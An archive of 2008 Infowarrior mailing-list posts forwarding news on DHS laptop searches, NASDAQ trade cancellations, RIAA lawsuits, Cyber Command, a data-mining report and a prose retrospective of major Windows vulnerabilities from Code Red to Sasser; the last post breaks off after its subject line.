From rforno at infowarrior.org Wed Oct 1 04:02:56 2008 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 1 Oct 2008 00:02:56 -0400 Subject: [Infowarrior] - Bill would limit Homeland Security laptop searches Message-ID: September 30, 2008 3:35 PM PDT Bill would limit Homeland Security laptop searches Posted by Stephanie Condon 8 comments http://news.cnet.com/8301-13578_3-10055020-38.html?part=rss&subj=news&tag=2547-1_3-0-20 The Homeland Security Department has declared its right to seize laptops at the U.S. border indefinitely, but legislation introduced Thursday is intended to curb that power. U.S. Sens. Russ Feingold (D-Wis.), Maria Cantwell (D-Wash.), and Rep. Adam Smith, (D-Wash.), introduced the Travelers Privacy Protection Act in response to the DHS policy allowing customs agents to detain a traveler's laptop for an unspecified period of time to review its contents, even absent of individualized suspicion. "Most Americans would be shocked to learn that upon their return to the U.S. from traveling abroad, the government could demand the password to their laptop, hold it for as long as it wants, pore over their documents, e-mails, and photographs, and examine which Web sites they visited--all without any suggestion of wrongdoing," Feingold said. "Focusing our limited law enforcement resources on law-abiding Americans who present no basis for suspicion does not make us any safer and is a gross violation of privacy." The legislation would require DHS to form reasonable suspicion of illegal activity before searching electronic devices carried by U.S. residents. The DHS would also be required to provide probable cause and a warrant or court order to hold such a device for more than 24 hours. The bill also limits what information acquired through electronic searches the DHS can disclose, and it requires the department to report on its border searches to Congress. The DHS refused to send a witness to a Senate hearing in June, chaired by Feingold, regarding searches of electronic devices, but it provided a written statement defending its policy. A ruling in April by the Ninth Circuit Court of Appeals also defended the agency's right to conduct the searches without reasonable suspicion. Similar bills, such as the Securing Our Borders and Our Data Act and the Border Security Search Accountability Act, have been introduced this year in the House. From rforno at infowarrior.org Wed Oct 1 04:08:32 2008 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 1 Oct 2008 00:08:32 -0400 Subject: [Infowarrior] - NASDAQ: Some Google, Rohm & Haas Trades Canceled Message-ID: <1989B567-78C6-4DC5-A565-1FDF2A64070B@infowarrior.org> Interesing.....--rf Some Google, Rohm & Haas Trades Canceled, Nasdaq Says (Update2) By Lynn Thomasson http://www.bloomberg.com/apps/news?pid=newsarchive&sid=a8SoUM1aLCzs Sept. 30 (Bloomberg) -- Some Google Inc. and Rohm & Haas Co. trades that occurred around 4 p.m. today will be canceled, the Nasdaq Stock Market said. Trades of Google shares above $425.29 or below $400.52 that were executed between 3:57 p.m. and 4:02 p.m. New York time today will be broken, Nasdaq's regulatory arm said on its Web site. Rohm & Haas trades above $73.20 or below $68.93 during the same time period also will be canceled. ``Participants should review their trading activity for potentially erroneous trades outside the above referenced times,'' Nasdaq said. Google, owner of the world's most popular search engine, fell as low as $200 at 4 p.m. Rohm & Haas, a chemicals producer, climbed to $100,000 moments before U.S. exchanges closed. Google's closing price will be adjusted to $400.52, Nasdaq said. That will shift the Nasdaq-100 Index to 1,594.63, a 6.6 percent advance for the day, according to the Web site. The index previously was listed as closing at 1,584.60. ``It's disturbing to watch the number of these things and there seem to be more and more,'' said Laszlo Birinyi, who oversees more than $350 million as president of Birinyi Associates Inc. in Westport, Connecticut. ``We're watching trades more closely.'' To contact the reporter on this story: Lynn Thomasson in New York at lthomasson at bloomberg.net . Last Updated: September 30, 2008 19:06 EDT From rforno at infowarrior.org Wed Oct 1 04:27:10 2008 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 1 Oct 2008 00:27:10 -0400 Subject: [Infowarrior] - Grid of 100, 000 computers heralds new internet dawn Message-ID: <48FE6098-66B6-49B0-8E96-05429659D8C7@infowarrior.org> (Skynet, anyone? -rf) September 29, 2008 Grid of 100,000 computers heralds new internet dawn http://technology.timesonline.co.uk/tol/news/tech_and_web/the_web/article4842964.ece A network of supercomputers called the Grid will allow information to be downloaded quicker than ever. Tasks that took hours will now take seconds Murad Ahmed, Technology Reporter A network of 100,000 computers providing the greatest data processing capacity yet unleashed has been created to cope with information pouring from the world?s largest machine. The Grid is the latest evolution of the internet and the world wide web and computer scientists will announce on Friday that it is ready to be connected to the Large Hadron Collider (LHC). It is designed for schemes where huge quantities of data need crunching, such as large research and engineering projects. The Grid has the kind of power required to download movies in seconds, and the ability to make high-definition video phone calls for the same price as a local call. More importantly, it should help to narrow the search for cures for diseases. However, it is unlikely to be directly available to most internet users until telecoms providers build the fibre-optic network required to use it. The Grid allows scientists at CERN, the European Organisation for Nuclear Research, to get access to the unemployed processing power of thousands of computers in 33 countries to deal with the data created by the LHC. Vint Cerf: 'web is running out of addresses' Time is running out for a smooth transition to a new system of addresses, according to the man known as the father of the web * 340,282,366,920,938,000, 000,000,000,000,000, 000,000 new web addresses created by internet chiefs . . . so we won?t run out of space soon, then * Who were the 'fathers of the internet'? Related Links * The future is all in the clouds * Vint Cerf: 'web is running out of addresses' * Who were the 'fathers of the internet'? Scientists at CERN, where the world wide web was invented, created the ?500 million Grid because they realised that a single computer would not be able to cope with the amount of data the LHC is expected to produce each year ? 15 petabytes, or 15 million gigabytes, which would fill 20 million CDs. They said that it was an extra facility laid on top of the internet, which originally linked computers around the world in the Seventies. Dr Bob Jones, a CERN scientist, said: ?The [world wide] web allows you to access information on other computers. What the Grid allows you to do is not only access the information, but make use of their computing resources and power.? He likened it to the National Grid. Users would be able to tap into massive amounts of processing power, but the source of the power would change, depending on availability. Processing tasks will be distributed between 11 gateway computer centres in ten countries, including Britain, which will share them out between more than 140 sites. One of the first jobs the Grid will tackle is handling the raw data for CERN?s experiments into finding proof of the Higgs boson, the so- called God particle. Its uses, however, extend well beyond particle physics and it has already been used on a smaller scale in research into diseases such as malaria and bird flu. ?The Grid cannot find a cure for cancer, but what it can do is make it quicker,? said Dr Jones, explaining that what might have taken a decade could now be done in weeks. David Britton, Professor of Physics at Glasgow University and a leading figure in the Grid project, said: ?The old traditional way to find cures for diseases is that you would go to the lab and try mixing various drugs and see how they work.? With the Grid, he said, scientists could run hundreds of thousands of simulations to create a shortlist of the drugs that are most likely to offer the potential for a cure. Researchers can then get to work testing the drugs singled out as promising. The Grid has also already been used to save lives in the immediate aftermath of earthquakes. Using the seismic data, scientists can use the Grid for simulations that pinpoint which areas are most affected, allowing rescue teams to direct their efforts where they are most needed. Many believe the world wide web and the internet are the same thing, but the internet is actually a massive network of networks, which connects millions of computers together globally, and the web is an information-sharing model built on top of the internet, which allows information to be accessed over the medium of the internet. From rforno at infowarrior.org Wed Oct 1 12:53:14 2008 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 1 Oct 2008 08:53:14 -0400 Subject: [Infowarrior] - Grenades as WMDs ... Schneier disagrees, so do I Message-ID: <151BDC58-11EC-4BC6-8E1D-4F7DADE95346@infowarrior.org> http://www.schneier.com/blog/archives/2008/10/hand_grenades_a.html Hand Grenades as Weapons of Mass Destruction I get that this is terrorism: A 24-year-old convert to Islam has been sentenced to 35 years in prison for plotting to set off hand grenades in a crowded shopping mall during the Christmas season. But I thought "weapons of mass destruction" was reserved for nuclear, chemical, and biological weapons. He was arrested in 2006 on charges of scheming to use weapons of mass destruction at the Cherryvale Mall in the northern Illinois city of Rockford. Like the continuing cheapening of the word "terrorism," we are now cheapening the term "weapons of mass destruction." From rforno at infowarrior.org Wed Oct 1 22:18:52 2008 From: rforno at infowarrior.org (Richard Forno) Date: Wed, 1 Oct 2008 18:18:52 -0400 Subject: [Infowarrior] - Bailout bill includes tax break on an ARROW company?!? Message-ID: ....and then we start seeing stuff like this embedded in the bill. I would be surprised if the House rejects the bill unless it's clean and doesn't include all these little pet projects for niche constituencies. But this is Congress being Congress. :( --rf According to Politico: (source: http://www.politico.com/news/stories/1008/14161.html) "With each permutation, the bill has steadily grown in size. Treasury?s initial plan was about three pages long. The House version, which failed, stretched to 110. The Senate substitute now runs over 450 pages. And tucked away in the tax provisions is a landmark health care provision demanding that insurance companies provide coverage for mental health treatment?such as hospitalization?on parity with physical illnesses." Bailout Bull's-Eye for Kids' Arrow-Makers' Tax Break (Update1) By Ryan J. Donmoyer Oct. 1 (Bloomberg) -- Rose City Archery Inc., an Oregon company that makes arrows used by children, hit a bull's-eye with Senate legislation that would rescue Wall Street banks. Senators attached a provision repealing a 39-cent excise tax on wooden arrows designed for children to an historic $700 billion bank rescue that is likely to pass tonight. The provision, originally proposed by Oregon senators Ron Wyden and Gordon Smith, will save manufacturers such as Rose City Archery in Myrtle Point, Oregon, about $200,000 a year. It's one of dozens of tax breaks benefiting Hollywood producers, stock- car racetrack owners and Virgin Islands rum- makers included in the broader legislation in an effort to win support from House Republicans, whose defection contributed to a rejection of an earlier version of the legislation two days ago on a 228-205 vote. < - > http://www.bloomberg.com/apps/news?pid=20601103&sid=aKd0vyGN8L2k&refer=us From rforno at infowarrior.org Thu Oct 2 19:02:12 2008 From: rforno at infowarrior.org (Richard Forno) Date: Thu, 2 Oct 2008 15:02:12 -0400 Subject: [Infowarrior] - Fwd: Skype and China References: <67858FF591FD524FBE16011177C09E96014CD267@ausx3mpc101.aus.amer.dell.com> Message-ID: <11B58CC7-8569-405E-83EB-5E6C726ADDE6@infowarrior.org> Begin forwarded message: > From: Ken > Date: October 2, 2008 1:21:18 PM EDT > > Subject: Skype and China > > Seems that some research group found out or discovered that a system > is > in place to track skype messages. > > http://www.nytimes.com/2008/10/02/technology/internet/02skype.html?ref=t > echnology From rforno at infowarrior.org Fri Oct 3 12:11:46 2008 From: rforno at infowarrior.org (Richard Forno) Date: Fri, 3 Oct 2008 08:11:46 -0400 Subject: [Infowarrior] - Music industry backs down over Itunes closure threat Message-ID: <96E557AA-202D-43A0-871B-5785FFB40121@infowarrior.org> Music industry backs down over Itunes closure threat The price is right... for the next five years By Emma Hughes: Friday, 03 October 2008, 10:59 AM http://www.theinquirer.net/gb/inquirer/news/2008/10/03/itunes-close APPLE?S THREAT to close down Itunes seems to have done the trick in getting the Copyright Royalty Board to keep the price of royalties paid to record companies for downloaded music at 9 cents a song. The Cupertino company threatened to close down the incredibly successful music marketplace if the decision went through to up the price of downloading songs from nine cents to 15, a 66 per cent price hike. So, The National Music Publishers Association, which has been pushing for the rise in royalties for 18 months seems to have backed down, no doubt realising that, without the huge amounts of wonga put its way by Apple fans would leave it rather impoverished. An Apple representative said, "We're pleased with the CRB's decision." The CRB achieved a hollow victory by getting a proposed cut in the rate to 4.8 cents proposed by some vendors, coming to an agreement of 9.1 cents a song for at least five years. We can't help but wonder how much cash went into the lawyers pockets over this whole shambles. This decision has been pronounced by the NMPA as ?a positive development for all songwriters and music publishers" and is the first time royalty rates have been mechanically decided for digital music. Jonathan Potter of the Digital Music Association, which represents online music stores like Apple said, "Keeping rates where they are will help digital services and retailers continue to innovate and grow for the next several years. " This move doesn?t come as much of a surprise, as Apple was highly unlikely to close the store ? over the last five years it has sold more than five billion songs online, and that's a whole load of nine cents. Digital sales figures show that songs and album sales rose by almost 50 percent last year according to the Recording Industry Association of America. Meanwhile CD sales dropped 20 per cent to $7.4bn (?4bn). Looks like our predictions were correct. Then again, the chances of Apple killing its cash cow were always pretty slim. ? From rforno at infowarrior.org Mon Oct 6 01:30:11 2008 From: rforno at infowarrior.org (Richard Forno) Date: Sun, 5 Oct 2008 21:30:11 -0400 Subject: [Infowarrior] - RIAA v. The People: Five Years Later Message-ID: RIAA v. The People: Five Years Later September, 2008 Related Issues: File Sharing On September 8, 2003, the recording industry sued 261 American music fans for sharing songs on peer-to-peer (P2P) file sharing networks, kicking off an unprecedented legal campaign against the people that should be the recording industry?s best customers: music fans.1 Five years later, the recording industry has filed, settled, or threatened legal actions against at least 30,000 individuals.2 These individuals have included children, grandparents, unemployed single mothers, college professors?a random selection from the millions of Americans who have used P2P networks. And there?s no end in sight; new lawsuits are filed monthly, and now they are supplemented by a flood of "pre- litigation" settlement letters designed to extract settlements without any need to enter a courtroom.3 But suing music fans has proven to be an ineffective response to unauthorized P2P file-sharing. Downloading from P2P networks is more popular than ever, despite the widespread public awareness of lawsuits. 4 And the lawsuit campaign has not resulted in any royalties to artists. One thing has become clear: suing music fans is no answer to the P2P dilemma. < - > http://www.eff.org/wp/riaa-v-people-years-later From rforno at infowarrior.org Mon Oct 6 12:21:56 2008 From: rforno at infowarrior.org (Richard Forno) Date: Mon, 6 Oct 2008 08:21:56 -0400 Subject: [Infowarrior] - Judge halts sales of RealDVD Message-ID: <84536E27-8E6D-4BB8-B84B-941F6E42B2D8@infowarrior.org> Judge halts sales of RealDVD (CNET) * Posted on Mon Oct 6, 2008 1:39AM EDT http://tech.yahoo.com/news/cnet/20081006/tc_cnet/8301102331005857493 - A judge has ordered RealNetworks to suspend the sale of RealDVD, the controversial software that hands users the ability to copy and store films to a hard drive, according to a report published by NewTeeVee.com, a technology-news blog. The film industry sought to prevent sales of RealDVD last week when it filed a lawsuit against RealNetworks. The Motion Picture Association of America accused Real of violating the Digital Millennium Copyright Act and breach of contract. According the story on NewTeeVee, the court wants sales to cease until Tuesday, when it has reviewed all the papers involved in the case. On Sunday evening, the RealDVD site notified visitors that because of the legal action taken by Hollywood, RealDVD was unavailable. "Rest assure we will work diligently to provide you with software that allows you to make a legal copy of your DVDs," the post read. Representatives from the MPAA and RealNetworks could not be reached Sunday. From rforno at infowarrior.org Wed Oct 8 02:08:33 2008 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 7 Oct 2008 22:08:33 -0400 Subject: [Infowarrior] - AFCYBER is back again (y/n/abort?) Message-ID: <72D7FBD1-0B1A-4CAC-A4AF-FF97EAE4E8E7@infowarrior.org> Air Force pursues Cyber Command again By Bob Brewin, bbrewin at govexec.com 10/07/08 http://www.nextgov.com/nextgov/ng_20081007_1366.php Top Air Force leadership has decided to pursue forming Cyber Command to defend Defense Department networks and to launch cyberattacks against foes after putting the project on hold in August. Comment on this article in The Forum.The service's leadership, including Air Force Secretary Michael Donley and Chief of Staff Gen. Norton Schwartz, made the decision last week at the Corona senior leadership conference in Colorado Springs, Colo., to continue its effort to stand up the command, said Capt. Michael Andrews, an Air Force spokesman. The service put Cyber Command on hold in August, saying it wanted to delay the program until new senior Air Force leaders, including Schwartz, had time to make a final decision on the scope and mission of the command. Last month, sources said the Pentagon decided that the U.S. Strategic Command in Omaha, Neb., should create and run a joint Cyber Command, a move that seemingly dashed any hopes the Air Force had to own Defense's cyber responsibilities. In May, Deputy Secretary of Defense Gordon England wrote in a memo, "Because all the combatant commands, military departments and other defense components need the ability to work unhindered in cyberspace, the domain does not fall within the purview of any particular department or component." The service originally had decided to establish the Cyber Command as a separate unit within Air Force Space Command, and during the Corona conference, leadership "discussed how the Air Force will continue to develop capabilities in this new domain and train personnel to execute this new mission." "The conduct of cyber operations is a complex issue, as [Defense] and other interagency partners have substantial equity in the cyber arena," Donley said. "We will continue to do our part to increase Air Force cyber capabilities and institutionalize our cyber mission." Andrews said the Air Force will provide more details on the Cyber Command later in October after discussions with Pentagon and congressional leadership. From rforno at infowarrior.org Wed Oct 8 02:09:34 2008 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 7 Oct 2008 22:09:34 -0400 Subject: [Infowarrior] - USG Report: Terrorist data mining doesn't work well Message-ID: <825A8330-233F-4E27-92C6-C743E0097F4B@infowarrior.org> http://news.cnet.com/8301-13578_3-10059987-38.html?part=rss&subj=news&tag=2547-1_3-0-20 October 7, 2008 9:30 AM PDT Government report: Data mining doesn't work well Posted by Declan McCullagh The most extensive government report to date on whether terrorists can be identified through data mining has yielded an important conclusion: It doesn't really work. A National Research Council report, years in the making and scheduled to be released Tuesday, concludes that automated identification of terrorists through data mining or any other mechanism "is neither feasible as an objective nor desirable as a goal of technology development efforts." Inevitable false positives will result in "ordinary, law-abiding citizens and businesses" being incorrectly flagged as suspects. The whopping 352-page report, called "Protecting Individual Privacy in the Struggle Against Terrorists," amounts to at least a partial repudiation of the Defense Department's controversial data-mining program called Total Information Awareness, which was limited by Congress in 2003. But the ambition of the report's authors is far broader than just revisiting the problems of the TIA program and its successors. Instead, they aim to produce a scholarly evaluation of the current technologies that exist for data mining, their effectiveness, and how government agencies should use them to limit false positives--of the sort that can result in situations like heavily-armed SWAT teams raiding someone's home and shooting their dogs based on the false belief that they were part of a drug ring. The report was written by a committee whose members include William Perry, a professor at Stanford University; Charles Vest, the former president of MIT; W. Earl Boebert, a retired senior scientist at Sandia National Laboratories; Cynthia Dwork of Microsoft Research; R. Gil Kerlikowske, Seattle's police chief; and Daryl Pregibon, a research scientist at Google. They admit that far more Americans live their lives online, using everything from VoIP phones to Facebook to RFID tags in automobiles, than a decade ago, and the databases created by those activities are tempting targets for federal agencies. And they draw a distinction between subject-based data mining (starting with one individual and looking for connections) compared with pattern-based data mining (looking for anomalous activities that could show illegal activities). But the authors conclude the type of data mining that government bureaucrats would like to do--perhaps inspired by watching too many episodes of the Fox series 24--can't work. "If it were possible to automatically find the digital tracks of terrorists and automatically monitor only the communications of terrorists, public policy choices in this domain would be much simpler. But it is not possible to do so." A summary of the recommendations: * U.S. government agencies should be required to follow a systematic process to evaluate the effectiveness, lawfulness, and consistency with U.S. values of every information-based program, whether classified or unclassified, for detecting and countering terrorists before it can be deployed, and periodically thereafter. * Periodically after a program has been operationally deployed, and in particular before a program enters a new phase in its life cycle, policy makers should (carefully review) the program before allowing it to continue operations or to proceed to the next phase. * To protect the privacy of innocent people, the research and development of any information-based counterterrorism program should be conducted with synthetic population data... At all stages of a phased deployment, data about individuals should be rigorously subjected to the full safeguards of the framework. * Any information-based counterterrorism program of the U.S. government should be subjected to robust, independent oversight of the operations of that program, a part of which would entail a practice of using the same data mining technologies to "mine the miners and track the trackers." * Counterterrorism programs should provide meaningful redress to any individuals inappropriately harmed by their operation. * The U.S. government should periodically review the nation's laws, policies, and procedures that protect individuals' private information for relevance and effectiveness in light of changing technologies and circumstances. In particular, Congress should re- examine existing law to consider how privacy should be protected in the context of information-based programs (e.g., data mining) for counterterrorism. By itself, of course, this is merely a report with non-binding recommendations that Congress and the executive branch could ignore. But NRC reports are not radical treatises written by an advocacy group; they tend to represent a working consensus of technologists and lawyers. The great encryption debate of the 1990s was one example. The NRC's so- called CRISIS report on encryption in 1996 concluded export controls-- that treated software like Web browsers and PGP as munitions--were a failure and should be relaxed. That eventually happened two years later. From rforno at infowarrior.org Wed Oct 8 02:10:42 2008 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 7 Oct 2008 22:10:42 -0400 Subject: [Infowarrior] - Worst Windows flaws of the past decade Message-ID: Worst Windows flaws of the past decade The exploits and oversights that left Redmond with egg on its face http://www.infoworld.com/archives/emailPrint.jsp?R=printThis&A=/article/08/10/06/41FE-windows-flaws_1.html By Andrew Brandt, IDG News Service October 06, 2008 June 25, 1998, and June 30, 2008, marked two important milestones in Microsoft's evolution of the Windows OS -- the passing of the torch from Windows 95 to Windows 98, and the less seemly transition from XP to Vista. In the 3,659 days between, users of Windows have been forced to bear witness to another evolution of sorts: bugs that left Windows open to exploits that appeared almost as fast as you could say, "On the Origin of Species." [ For some fun of the hacker and admin variety, see "Stupid hacker tricks, part two: The folly of youth" and "Stupid user tricks 3: IT admin follies." ] Uncovering -- and exploiting -- Windows vulnerabilities has made sport for many and careers for many more. Entire industries have sprung up to protect Windows users from previously unknown flaws, while malware authors have matured their practices from juvenile pranks to moneymaking criminal enterprises. Caught in the middle of this never-ending onslaught is the innocent PC user and the besieged IT admin -- you. And though Microsoft and the entire software industry have labored tirelessly to handle zero-day exploits and to develop protocols for reporting potential security problems, we've seen and experienced several colossal security meltdowns thanks to the humble Windows bug. These errors, buried in millions of lines of code, have steered great corporations and turned the tide of fortunes. It's high time they got the credit they deserve. Here are the worst Windows flaws we've endured since the introduction of Windows 98. Password "password" would have been more secure Bug identifier: VCE-2000-0979, MS00-072 Description: Share Level Password vulnerability Alias: Windows 9x share password bypass Date published: Oct. 10, 2000 Windows 9x introduced a nifty little concept wherein users could host a password-protected mini file server, aka a share, on their PCs. The idea was simple: Allow users of networked computers to host and share files securely. Only the padlock Microsoft used to lock the door came equipped with a gaping hole that rendered it useless. "When processing authentication requests for a NetBIOS share, Windows 95/98 would look at the length of the password sent by the attacker and then only compare that number of bytes to the real password," writes vulnerability expert H.D. Moore, who manages the Metasploit Framework project. Oops. "This let the attack specify a password of zero bytes and gain access to the share," without actually knowing the password at all, Moore explains. "The real damage," he continues, "was that by trying all characters of incrementing lengths, they could literally obtain the password for share from the server." Upshot: Rather than functioning as a lock on a door, the password authentication scheme for Windows 95/98's File and Print Sharing acted more like a nail through a hasp -- to open the door you only needed to pull out the nail, with hardly any effort. Folder traversal: Total server control with a single URL Bug identifier: MS00-078 Description: Web server folder traversal vulnerability Alias: Directory traversal bug Date published: Oct. 17, 2000 If there's one thing we've learned from the past decade of Microsoft patches, it?s that not everyone keeps on top of them. When Microsoft published this particular advisory, the patch that fixed the problem (MS00-057) had already been released two months prior. With this bug, if you knew the layout of a Microsoft file system -- which folders appear where -- you could send a command to a Web server that essentially gave you total control. As anyone who has spent any time using a Windows computer will tell you, it's not hard to find your way around the hard drive. Documents go in a particular folder path; most applications are put in another folder path; and so on. By using dots and backslashes (or their respective unicode representations) in the URL, this bug allowed you to navigate up and down the file system and execute commands, just by knowing a few simple rules and how Windows organizes itself. While account permissions for IIS are somewhat limited, a related exploit helped escalate privileges, giving remote users the ability to do whatever they wanted to with Windows servers simply by sending a few URLs. "Originally found as an anonymous post in the PacketStorm forums, this resulted in nearly two straight years of mass ownage against Windows web servers," Moore writes. Upshot: Directory traversal opened up a new world for automated attacks that merely had to call a particular URL to do their dirty work. Code Red: Deadly bug, disgusting soda Bug identifier: MS01-033 Description: Unchecked buffer in index server ISAPI (Internet Server API) extension could enable Web server compromise Alias: The Code Red bug Date published: June 18, 2001 What happens when you send a ton of data at a Microsoft Web server? If it was the summer of 2001, well, you owned the network. At least that's what happened a little more than a month after Microsoft released this obscure-sounding patch for IIS Web servers. The nature of the bug was simple: Take an IIS server, invoke a buffer overflow, and commands spill into other parts of system memory. Because the commands were issued in the context of the system itself, the bug opened up for exploitation virtually all aspects of the server's operation. And exploitation happened, all right, on a scale that hadn't been seen before. On the afternoon of Friday, July 13, 2001, security engineers at eEye Digital Security received reports of a worm that was spreading rapidly through its customers' networks. Fueled by a limited edition, crimson, caffeinated, high-fructose corn syrup-based beverage, Mark Maiffret and Ryan Permeh spent a weekend reverse-engineering the worm, and alerted the world to its presence. What the worm did was probe vulnerable IIS servers, infect them, and create 100 threads of itself, which then spread to other computers. If the date was between the 20th of the month and the end of the month, it would attempt to spew data at www.whitehouse.gov. Permeh and Maiffret estimated that the worm could infect approximately 500,000 unique IP addresses per day. Upshot: Code Red really drove home the importance of patching bugs soon after Microsoft released the patch, because the patches themselves give malware authors clues to exactly where they should look for new vulnerabilities. Fastest infection. Ever. Bug identifier: MS02-039 Description: Buffer overruns in SQL Server 2000 Resolution Service could enable remote code execution Alias: The SQL Slammer bug Date published: July 24, 2002 While technically not an OS bug, the SQL Slammer bug deserves honorary mention due to the sheer velocity with which vulnerable systems were infected. The bug targeted Microsoft's database server. Vulnerable computers were subject to buffer overflows that, if properly crafted, could place commands into memory to cause the targeted system to execute those commands with the permissions of the database service. Patching was complicated by the fact that admins needed to run an earlier patch before they could run the MS02-039 fix. The bug affected primarily corporate server systems, but also affected home users who had MSDE (Microsoft SQL Server Desktop Engine) installed. That made a number of home users, some of whom didn't even know they had MSDE on their machines, unwitting participants in the carnage to come. Because the Slammer worm primarily targeted servers running databases, it didn't infect millions of machines. It did, however, spread rapidly -- so rapidly, in fact, that it had infected roughly 9 out of 10 vulnerable machines within 10 minutes of being released on Jan. 25, 2003. The entire worm was only 376 bytes, and fit into a single packet of data. The MS02-039 bug was "one of the biggest oversights of all time," says Steve Manzuik, senior manager of security research at Juniper Networks, "not because it was an easy or obvious bug to find -- it wasn't." "At the time of the patch, no one realized that every vulnerable SQL installation was also listening on a UDP (User Datagram Protocol) port that they could be exploited over," Manzuik explains. "Many administrators simply locked down access to the SQL TCP ports while forgetting about UDP." A postmortem by the Cooperative Association for Internet Data Analysis revealed that the worm was a model of efficiency, doubling the number of infected systems every 8.5 seconds, and flooding the Internet with so many infection attempts that routers shut down. When restarted, so many routers attempted to update their routing tables simultaneously that normal Internet traffic simply couldn't get through the gridlock. Upshot: SQL Slammer demonstrated the power of a vulnerability that could fit within a single data packet, and brought home the lesson that a single application weakness could cause the entire Internet to grind to a standstill. And it's still out there, drifting around on a few old systems, looking for new hosts to infect. Billy Gates, stop making money! Make malware instead. Bug identifier: MS03-026 Description: Buffer overrun in RPC interface could allow code execution Alias: The Blaster Worm bug Date published: July 16, 2003 The DCOM RPC interface is a common component of NT-based Windows OSes, including NT, 2000, XP, and Server 2003. In the summer of 2003, it became the subject of intense scrutiny. As Microsoft described in the bulletin that accompanied the patch, a successful exploit only required the attacker to send a "specially formed request" to a vulnerable PC -- a bit like dangling candy in front of a ravenously hungry baby. By Aug. 11, the Blaster worm arrived, and though it spread rapidly, it was fairly easy to block with a firewall. Unfortunately, protecting home systems with firewalls wasn't common practice at the time. Home users' PCs -- connected directly to the Internet -- got whomped by the worm. When the worm's code crashed the infected computer's RPC service, the computer would display a message warning of imminent shutdown, and unceremoniously reboot itself. The worm had another message, this one to Microsoft's founder, and embedded within its code: "billy gates why do you make this possible? Stop making money and fix your software!!" But it was fixed. Or at least it would have been if people had patched their systems. At the end of the summer, Microsoft released a second set of updates in MS03-039 that blocked additional ports that attackers could use to mess with the RPC service. Upshot: We're all in better shape thanks to the wide adoption of firewalls in the home. Thanks in part to Blaster and its ilk, most broadband modems have one built in. That sassy bug has a lot of spunk Bug identifier: CVE-2003-0533, MS04-011 Description: Stack-based overflow in certain Active Directory service functions in LSASRV.DLL Alias: The Sasser bug Date published: April 13, 2004 In yet another example of ironic buffer-overflow goodness, this bug made the security subsystem of Windows the agent of evil itself. And, once again, malicious coders used Microsoft's own patch to figure out exactly where to target the OS. As Windows XP's gatekeeper, LSASS (Local Security Authority Subsystem) manages the permissions of a PC's user accounts. So when eEye -- the same company that discovered the Code Red bug -- quietly disclosed the details of this flaw to Microsoft in October 2003, it touched off six months of furious coding in Redmond that culminated in a patch that fixed 13 other Windows 98, NT, 2000, XP, and Server 2003 flaws, as well as the LSASS bug. And, within 18 days, the Sasser worm was cruising the Internet, hopping from one unpatched machine to another. The poorly coded worm wreaked havoc, shutting down networks around the world. Even though a fix was already available, many users -- in particular, corporate IT managers -- still had not applied MS04-011. By May 1, 2004, work on fixing the unintended damage caused by Sasser had become a round-the- clock operation, says then director of the Microsoft Security Response Center, Kevin Kean, with "a number of war rooms and rotating shifts" for MSRC staffers. Upshot: What was that about patching as soon as the updates are available? Lessons that should have been learned three years earlier didn't really sink in until Sasser publicly pummeled patchless PCs to pulp. WMF: Wherein malware is foisted Bug identifier: CVE-2005-4560, MS06-001 Description: Vulnerability in graphics-rendering engine could allow remote code execution Alias: Windows Metafile vulnerability, aka drive-by downloads Date published: Jan. 5, 2006 Over the winter holidays in 2005, security researchers began discussing a newly discovered vulnerability in a Windows library used by the OS to display various kinds of graphics in apps and the OS itself. The problem stemmed from a particular image file format, native to Windows since the days of Windows 3.0, called WMF (Windows Metafile). Used as the native format for storing graphics within Microsoft Office documents, support for WMF was by that point thoroughly embedded into Microsoft products. WMF files contain function calls that a program sends to the GDI (Graphics Driver Interface). Someone discovered that WMF files can contain executable code as well. This would allow you to, say, create a WMF file that, merely by being viewing, invokes Internet Explorer to visit a particular URL, download a file, and execute that file. Special. The aftermath of the discovery followed a familiar pattern. Microsoft issued a patch on Jan. 5, 2006, in record time. But for a long while, unpatched computers running vulnerable versions of gdi32.dll roamed the Internet, slurping up mountains of malware. The bug had far-reaching effects, enabling malicious code to be foisted on unsuspecting users and executed in a variety of ways: previewing an e-mail containing the malicious WMF file in Outlook; viewing an image preview in Explorer; viewing a malicious WMF in certain third-party graphics programs; indexing a hard disk that contained a malicious file; following a URL link in an e-mail, IM, or on another Web page to a site where the malicious file was embedded in the Web page. Upshot: We learned that nothing is sacred, that any file format could be considered hostile. And we also got a cool new name for an exploit method: drive-by downloads. MDAC: The component that keeps on giving (headaches) Bug identifier: CVE-2006-0003, MS06-014 Description: Vulnerability in MDAC (Microsoft Data Access Components) could allow code execution Alias: MDAC RDS.Dataspace ActiveX bug Date published: April 11, 2006 Way back in 1998, Microsoft issued a security bulletin about a component of IIS that ran under Windows NT Server called Microsoft Data Access Components. In the bulletin, MS98-004, Microsoft warned that a part of MDAC called the RDS (Remote Data Service) had a vulnerability that allowed unauthorized people to browse databases. Flash-forward eight years to the spring of 2006. Microsoft released a security bulletin about a component of MDAC called RDS, which has a vulnerability that permits malicious Web servers to perform drive-by downloads against the unpatched PCs of unsuspecting victims. Eerily familar. In the later case, it was an ActiveX control that allowed users to connect to RDS through IE and wreak havoc. The ActiveX control doesn't behave as intended, and can be loaded and exploited if you visit the wrong Web site. Of course, by 2006, MDAC isn't just loaded on servers; you may have it on your PC. Moreover, the bad guys have changed tactics. No longer content to wait patiently for you to happen upon their malicious Web site, they spam you with links, buy ads based on Google searches, and load their pages with SEO (search engine optimization)-rich keywords. The result, however, is the same: Visit and be exploited. In fact, the bad guys are now using off-the-shelf exploit software to put malware onto your machine. A tool called MPack that's loaded on malicious Web sites can check to see what browser version you're using and what patches you have installed. Based on this analysis, it delivers the exploits that will do the most damage. More galling is that they don't even bother to hide what they're doing, naming the Web page that performs the exploit "mdac4.php." Upshot: The MDAC RDS is a complex system, with a multitude of patches available depending on which version you have installed. Manually choosing the right patch can be a complicated task. But with such a serious flaw, you can't afford to make a mistake. Patches like these have helped push advancements in Windows Update, which scan your system and pick the right patch automatically, so you don't have to. From rforno at infowarrior.org Wed Oct 8 02:59:12 2008 From: rforno at infowarrior.org (Richard Forno) Date: Tue, 7 Oct 2008 22:59:12 -0400 Subject: [Infowarrior] - NSA Tokeneer (high-assurance computing) 